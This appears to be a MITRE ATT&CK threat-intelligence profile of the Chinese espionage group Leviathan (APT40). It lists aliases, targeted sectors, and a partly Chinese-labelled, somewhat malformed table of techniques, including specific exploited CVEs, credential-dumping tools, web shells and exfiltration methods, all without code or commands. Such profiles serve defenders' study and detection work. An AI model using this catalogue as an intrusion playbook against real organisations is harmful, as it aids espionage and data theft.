Leviathan
Leviathan is a Chinese state-sponsored cyber espionage group that has been attributed to the Ministry of State Security's (MSS) Hainan State Security Department and an affiliated front company.[1] Active since at least 2009, Leviathan has targeted the following sectors: academia, aerospace/aviation, biomedical, defense industrial base, government, healthcare, manufacturing, maritime, and transportation across the US, Canada, Europe, the Middle East, and Southeast Asia.[1][2][3]
Associated Group Descriptions
| Name | Description |
|---|---|
| MUDCARP | |
| Kryptonite Panda | |
| Gadolinium | |
| BRONZE MOHAWK | |
| TEMP.Jumper |
Leviathan was previously reported upon by FireEye as TEMP.Periscope and TEMP.Jumper.[1][8] |
| APT40 |
FireEye reporting on TEMP.Periscope (which was combined into APT40) indicated TEMP.Periscope was reported upon as Leviathan.[1][2][3][8] |
| TEMP.Periscope |
Leviathan was previously reported upon by FireEye as TEMP.Periscope and TEMP.Jumper.[1][3][8] |
| Gingham Typhoon |
Techniques Used
| Domain | ID | Name | Use | |
|---|---|---|---|---|
| Enterprise | T1197 | BITS任务 |
Leviathan has used BITSAdmin to download additional tools.[3] |
|
| Enterprise | T1047 | Windows管理规范 | ||
| Enterprise | T1546 | .003 | 事件触发执行: Windows Management Instrumentation Event Subscription | |
| Enterprise | T1090 | .003 | 代理: Multi-hop Proxy |
Leviathan has used multi-hop proxies to disguise the source of their malicious traffic.[1] |
| Enterprise | T1534 | 内部鱼叉式钓鱼 |
Leviathan has conducted internal spearphishing within the victim's environment for lateral movement.[1] |
|
| Enterprise | T1572 | 协议隧道 |
Leviathan has used protocol tunneling to further conceal C2 communications and infrastructure.[1] |
|
| Enterprise | T1140 | 反混淆/解码文件或信息 |
Leviathan has used a DLL known as SeDll to decrypt and execute other JavaScript backdoors.[2] |
|
| Enterprise | T1547 | .001 | 启动或登录自动启动执行: Registry Run Keys / Startup Folder |
Leviathan has used JavaScript to create a shortcut file in the Startup folder that points to its main backdoor.[2][3] |
| .009 | 启动或登录自动启动执行: Shortcut Modification |
Leviathan has used JavaScript to create a shortcut file in the Startup folder that points to its main backdoor.[2][3] |
||
| Enterprise | T1059 | .001 | 命令与脚本解释器: PowerShell | |
| .005 | 命令与脚本解释器: Visual Basic | |||
| Enterprise | T1133 | 外部远程服务 |
Leviathan has used external remote services such as virtual private networks (VPN) to gain initial access.[1] |
|
| Enterprise | T1203 | 客户端执行漏洞利用 |
Leviathan has exploited multiple Microsoft Office and .NET vulnerabilities for execution, including CVE-2017-0199, CVE-2017-8759, and CVE-2017-11882.[2][3][1][4] |
|
| Enterprise | T1585 | .001 | 建立账户: Social Media Accounts |
Leviathan has created new social media accounts for targeting efforts.[1] |
| .002 | 建立账户: Email Accounts |
Leviathan has created new email accounts for targeting efforts.[1] |
||
| Enterprise | T1560 | 归档收集数据 |
Leviathan has archived victim's data prior to exfiltration.[1] |
|
| Enterprise | T1003 | 操作系统凭证转储 |
Leviathan has used publicly available tools to dump password hashes, including HOMEFRY.[8] |
|
| .001 | LSASS Memory |
Leviathan has used publicly available tools to dump password hashes, including ProcDump and WCE.[8] |
||
| Enterprise | T1589 | .001 | 收集受害者身份信息: Credentials |
Leviathan has collected compromised credentials to use for targeting efforts.[1] |
| Enterprise | T1074 | .001 | 数据分段: Local Data Staging |
Leviathan has used C:\Windows\Debug and C:\Perflogs as staging directories.[3][1] |
| .002 | 数据分段: Remote Data Staging |
Leviathan has staged data remotely prior to exfiltration.[1] |
||
| Enterprise | T1078 | 有效账户 |
Leviathan has obtained valid accounts to gain initial access.[1][4] |
|
| Enterprise | T1505 | .003 | 服务器软件组件: Web Shell |
Leviathan relies on web shells for an initial foothold as well as persistence into the victim's systems.[8][1] |
| Enterprise | T1189 | 浏览器攻击 | ||
| Enterprise | T1027 | .001 | 混淆文件或信息: Binary Padding |
Leviathan has inserted garbage characters into code, presumably to avoid anti-virus detection.[2] |
| .003 | 混淆文件或信息: Steganography |
Leviathan has used steganography to hide stolen data inside other files stored on Github.[1] |
||
| .013 | 混淆文件或信息: Encrypted/Encoded File |
Leviathan has obfuscated code using base64 and gzip compression.[2] |
||
| Enterprise | T1204 | .001 | 用户执行: Malicious Link |
Leviathan has sent spearphishing email links attempting to get a user to click.[2][1] |
| .002 | 用户执行: Malicious File |
Leviathan has sent spearphishing attachments attempting to get a user to click.[2][1] |
||
| Enterprise | T1218 | .010 | 系统二进制代理执行: Regsvr32 | |
| Enterprise | T1102 | .003 | 网络服务: One-Way Communication |
Leviathan has received C2 instructions from user profiles created on legitimate websites such as Github and TechNet.[3] |
| Enterprise | T1583 | .001 | 获取基础设施: Domains |
Leviathan has established domains that impersonate legitimate entities to use for targeting efforts. [1][4] |
| Enterprise | T1586 | .001 | 账号妥协: Social Media Accounts |
Leviathan has compromised social media accounts to conduct social engineering attacks.[1] |
| .002 | 账号妥协: Email Accounts |
Leviathan has compromised email accounts to conduct social engineering attacks.[1] |
||
| Enterprise | T1105 | 输入工具传输 |
Leviathan has downloaded additional scripts and files from adversary-controlled servers.[2][3] |
|
| Enterprise | T1055 | .001 | 进程注入: Dynamic-link Library Injection |
Leviathan has utilized techniques like reflective DLL loading to write a DLL into memory and load a shell that provides backdoor access to the victim.[4] |
| Enterprise | T1559 | .002 | 进程间通信: Dynamic Data Exchange |
Leviathan has utilized OLE as a method to insert malicious content inside various phishing documents. [4] |
| Enterprise | T1021 | .001 | 远程服务: Remote Desktop Protocol |
Leviathan has targeted RDP credentials and used it to move through the victim environment.[8] |
| .004 | 远程服务: SSH | |||
| Enterprise | T1041 | 通过C2信道渗出 | ||
| Enterprise | T1567 | .002 | 通过网络服务渗出: Exfiltration to Cloud Storage |
Leviathan has used an uploader known as LUNCHMONEY that can exfiltrate files to Dropbox.[2][3] |
| Enterprise | T1566 | .001 | 钓鱼: Spearphishing Attachment |
Leviathan has sent spearphishing emails with malicious attachments, including .rtf, .doc, and .xls files.[2][1] |
| .002 | 钓鱼: Spearphishing Link |
Leviathan has sent spearphishing emails with links, often using a fraudulent lookalike domain and stolen branding.[2][1] |
||
| Enterprise | T1553 | .002 | 颠覆信任控制: Code Signing |
Leviathan has used stolen code signing certificates to sign malware.[3][8] |
Software
References
- CISA. (2021, July 19). (AA21-200A) Joint Cybersecurity Advisory – Tactics, Techniques, and Procedures of Indicted APT40 Actors Associated with China’s MSS Hainan State Security Department. Retrieved August 12, 2021.
- Axel F, Pierre T. (2017, October 16). Leviathan: Espionage actor spearphishes maritime and defense targets. Retrieved February 15, 2018.
- FireEye. (2018, March 16). Suspected Chinese Cyber Espionage Group (TEMP.Periscope) Targeting U.S. Engineering and Maritime Industries. Retrieved April 11, 2018.
- Accenture iDefense Unit. (2019, March 5). Mudcarp's Focus on Submarine Technologies. Retrieved August 24, 2021.
- Adam Kozy. (2018, August 30). Two Birds, One Stone Panda. Retrieved August 24, 2021.
- Ben Koehl, Joe Hannon. (2020, September 24). Microsoft Security - Detecting Empires in the Cloud. Retrieved August 24, 2021.
- SecureWorks. (n.d.). Threat Profile - BRONZE MOHAWK. Retrieved August 24, 2021.
- Plan, F., et al. (2019, March 4). APT40: Examining a China-Nexus Espionage Actor. Retrieved March 18, 2019.
- Microsoft . (2023, July 12). How Microsoft names threat actors. Retrieved November 17, 2023.